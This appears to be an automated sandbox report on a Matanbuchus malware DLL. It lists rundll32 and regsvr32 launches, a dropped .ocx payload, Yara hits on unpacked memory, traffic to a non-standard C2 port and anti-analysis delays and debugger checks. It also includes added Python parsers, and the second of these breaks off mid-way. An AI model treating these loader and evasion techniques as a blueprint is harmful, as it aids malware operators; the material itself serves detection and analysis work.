Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winrnr.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: Yara match File source: file.dll, type: SAMPLE
Source: Yara match File source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3D15C6 push ecx; ret 14_2_7F3D15D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDE15C6 push ecx; ret 18_2_7EDE15D9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 34_2_7EEE15C6 push ecx; ret 34_2_7EEE15D9
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\8f08\user-PC\user-PC.ocx Jump to dropped file
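The Yara hits above land on three kinds of artifact: the submitted DLL, unpacked PE images (`<pid>.<run>.<image>.<base>.<n>[.raw].unpack`), and raw memory dumps (`.sdmp`). The dump names encode the page protection of the region, which is what tells an analyst whether the match sits in an RWX private allocation (the classic unpacked-payload location) or in something else. The helper below is an added example written for this page, not Joe Sandbox's code or the report's own tooling; it assumes the `.sdmp` field layout `<process index>.<run>.<dump counter>.<base address>.<protect>.<state>.<type>.<reserved>.sdmp`, which is an interpretation checked only against the names in this report (0x0E, 0x12 and 0x22 line up with process indices 14, 18 and 34 of the unpack names), and decodes the flag fields with the standard winnt.h constants.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: a subset of the "Yara match" lines from the Data Obfuscation section.
YARA_LINES = r"""
Source: Yara match File source: file.dll, type: SAMPLE
Source: Yara match File source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
"""

YARA_RE = re.compile(r"Yara match File source: (?P<src>.+?), type: (?P<kind>\w+)")
# Assumed .sdmp layout (interpretation, checked only against this report's names):
#   <process index>.<run>.<dump counter>.<base address>.<protect>.<state>.<type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<counter>[0-9A-F]+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$", re.IGNORECASE)
# <process index>.<run>.<image>.<base address>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<run>\d+)\.(?P<image>.+?\.exe)\.(?P<base>[0-9a-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$",
    re.IGNORECASE)

# Win32 MEMORY_BASIC_INFORMATION constants from winnt.h.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def decode_protect(value: int) -> str:
    names = [PAGE_PROTECT.get(value & 0xFF, f"0x{value & 0xFF:x}")]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def parse_sdmp(name: str) -> Optional[Dict]:
    """Decode one memory-dump name; None if the name is not an .sdmp identifier."""
    m = SDMP_RE.match(name)
    if not m:
        return None
    protect = int(m["protect"], 16)
    return {"name": name, "proc": int(m["proc"], 16), "run": int(m["run"], 16),
            "base": int(m["base"], 16), "protect": decode_protect(protect),
            "executable": bool(protect & 0xF0),  # any PAGE_EXECUTE* value
            "state": MEM_STATE.get(int(m["state"], 16), m["state"]),
            "mtype": MEM_TYPE.get(int(m["mtype"], 16), m["mtype"])}


def yara_sources(report_text: str) -> List[tuple]:
    return [(m["src"], m["kind"]) for line in report_text.splitlines() if (m := YARA_RE.search(line))]


def correlate(report_text: str) -> List[Dict]:
    """Attach to each MEMORY hit the UNPACKEDPE names that share its process index and base address."""
    sources = yara_sources(report_text)
    unpacks = []
    for src, kind in sources:
        u = UNPACK_RE.match(src) if kind == "UNPACKEDPE" else None
        if u:
            unpacks.append({"proc": int(u["proc"]), "image": u["image"],
                            "base": int(u["base"], 16), "name": src})
    findings = []
    for src, kind in sources:
        dump = parse_sdmp(src) if kind == "MEMORY" else None
        if dump is None:
            continue
        hits = [u for u in unpacks if u["proc"] == dump["proc"] and u["base"] == dump["base"]]
        dump["image"] = hits[0]["image"] if hits else None
        dump["unpack_names"] = [u["name"] for u in hits]
        findings.append(dump)
    return findings


def rwx_private_dumps(report_text: str) -> List[Dict]:
    """Committed, private, execute+write regions carrying the match: the unpacked-payload signature."""
    return [f for f in correlate(report_text) if f["protect"] == "PAGE_EXECUTE_READWRITE"
            and f["mtype"] == "MEM_PRIVATE" and f["state"] == "MEM_COMMIT"]


if __name__ == "__main__":
    for f in correlate(YARA_LINES):
        print(f"proc {f['proc']:<3} {f['image'] or '?':<13} 0x{f['base']:08X} {f['protect']:<23} "
              f"{f['state']} {f['mtype']} <- {', '.join(f['unpack_names']) or 'no unpack'}")
    print(f"{len(rwx_private_dumps(YARA_LINES))} RWX private region(s) carry the Yara match")
```

Run against the lines above, three of the four memory hits (0x7F330000 in rundll32 process 14, 0x7ED40000 in rundll32 process 18, 0x7EE40000 in regsvr32 process 34) decode as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, while the 0x4910000 region is PAGE_READWRITE only. Each RWX region has a matching `.unpack` dump at the same base, which is the one to open first when pulling the Matanbuchus payload out of the host process.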

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7EDCC7B0 GetSystemDefaultLangID,IsIconic,SetLastError,GetCommandLineW,lstrlenA,GetSystemDefaultLCID, 18_2_7EDCC7B0
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetAdaptersInfo, 14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetAdaptersInfo, 18_2_7EDBB430
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetAdaptersInfo, 34_2_7EEBB430
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 5.5 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 5.5 %
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 5.5 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_7F3AAF80 GetSystemInfo, 14_2_7F3AAF80
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 130000
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 130000
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
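The lines in this section are the raw evasion evidence: HTTP on a port that is not 80 or 443, long thread delays, the Win32_Processor WMI query that is commonly used to spot virtual machines, DebugPort queries, IsDebuggerPresent and repeated PEB reads through fs:[30h]. The script below is an added example for this page, not part of the Joe Sandbox report or its tooling; it turns a batch of such lines into a per-process summary and infers the C2 listener port. Two assumptions are built in and labelled in the code: the server port is the one that appears in every flow while each client port is a fresh ephemeral port (with the destination side as tie-breaker when there is only one flow), and the negative sign on the "Thread sleep time" values is taken to be the relative-interval convention used by NtDelayExecution, so only the magnitude is kept.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample input: a subset of the behaviour lines in this section of the report.
REPORT_LINES = r"""
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown Network traffic detected: HTTP traffic on port 54801 -> 49763
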